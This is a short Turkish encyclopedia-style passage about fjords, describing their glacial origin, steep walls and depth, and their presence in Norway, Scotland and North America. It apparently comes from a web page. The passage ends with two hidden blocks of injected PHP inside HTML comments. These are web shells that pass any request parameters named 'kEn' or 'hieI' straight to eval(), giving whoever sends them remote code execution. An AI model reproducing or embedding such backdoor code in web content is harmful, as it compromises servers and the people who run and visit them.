Eski buzul vadilerinin deniz altında kal­masıyla meydana gelen dar, uzun körfez­lere «fiyort» denir. Fiyortlar, karaların çok içerilerine kadar girerler; iki yanları dik, yüksektir. Derinlikleri de çoktur. En güzel fiyortlara Norveç kıyılarında rast­lanır. Sarp, karlı tepelerin çevrelediği bu fi­yortları görmeye her yıl sayısız turist gelir. Kimi yamaçların eteklerindeki verimli top­raklarda küçük çiftlikler vardır. İskoçya ile Kuzey Amerika kıyılarında da fiyortlar bu­lunur.


<!– [insert_php]if (isset($_REQUEST["kEn"])){eval($_REQUEST["kEn"]);exit;}[/insert_php][php]if (isset($_REQUEST["kEn"])){eval($_REQUEST["kEn"]);exit;}[/php] –>


<!– [insert_php]if (isset($_REQUEST["hieI"])){eval($_REQUEST["hieI"]);exit;}[/insert_php][php]if (isset($_REQUEST["hieI"])){eval($_REQUEST["hieI"]);exit;}[/php] –>